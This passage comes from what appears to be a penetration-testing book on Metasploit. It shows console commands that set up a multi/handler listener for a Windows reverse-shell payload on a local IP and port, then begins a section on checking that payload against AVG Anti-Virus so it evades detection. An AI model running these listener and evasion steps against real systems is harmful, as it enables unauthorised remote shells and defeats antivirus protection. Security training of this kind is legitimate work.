Avoiding Detection
101
msf >
use exploit/multi/handler
msf exploit(handler) >
show options
. . . SNIP . . .
Payload options (windows/meterpreter/reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
EXITFUNC process yes Exit technique: seh, thread, process
LHOST 192.168.1.101 yes The local address
LPORT 4444 yes The local port
. . . SNIP . . .
msf exploit(handler) >
set PAYLOAD windows/shell_reverse_tcp
PAYLOAD => windows/shell_reverse_tcp
msf exploit(handler) >
set LHOST 192.168.1.101
LHOST => 192.168.1.101
msf exploit(handler) >
set LPORT 31337
LPORT => 31337
msf exploit(handler) >
We first use the
multi/handler
module at and get a quick display of the
options at . Then, we set our payload to be a Windows reverse shell at so
that it matches the behavior of the executable we created earlier, tell it the IP
at and the port to listen on at , and we’re ready to go.
Evading Antivirus Detection
We’ll use the popular AVG Anti-Virus product in the following examples.
Because it can take some time and multiple tries to circumvent certain antivirus
engines, before we try to deploy a payload, we check the antivirus solution to
make sure the payload gets past it before we deploy it on the target.
In this case, when we test our payload with AVG, we see that it’s detected,
as shown in Figure 7-1.
Figure 7-1: AVG detected our payload.